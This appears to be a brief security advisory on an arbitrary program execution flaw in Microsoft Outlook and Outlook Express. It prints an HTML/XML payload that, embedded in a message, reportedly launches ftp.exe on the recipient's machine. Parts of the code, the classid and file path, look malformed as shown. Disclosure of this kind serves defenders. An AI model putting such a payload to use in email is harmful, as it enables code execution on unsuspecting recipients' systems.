Microsoft Outlook and Outlook Express Arbitrary Program Execution Vulnerability

Microsoft Outlook and Outlook Express Arbitrary Program Execution Vulnerability

Embedding the following object in an HTML message will reportedly cause ftp.exe to be executed:

<xml id=oExec> <security><exploit> <![CDATA[ <object id="oFile"
classid="clsid:11111111-1111-1111-1111"
code base="C:WINDOWSFTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html
dataSrc=#oExec></SPAN>